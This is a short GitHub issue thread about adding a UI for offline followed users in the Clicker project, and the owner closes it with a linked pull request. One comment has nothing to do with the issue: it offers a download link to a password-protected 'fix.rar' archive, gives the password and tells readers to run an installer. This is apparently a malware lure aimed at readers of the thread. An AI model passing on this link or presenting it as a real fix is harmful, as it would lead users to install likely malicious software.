### ISSUE TITLE
Create UI for the offline followed users

### ISSUE THREAD

**Issue by thePlebDev** [thePlebDev/Clicker#1668]
# Proposed change
- I need to create the UI for the offline followed user. This Ui should be the same as the UI in the mod channels offline

# Why is this important
- This is what will allow users to access the vods of their channels

# Additional context
- n/a

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by thePlebDev** [comment]
- closed with #1669
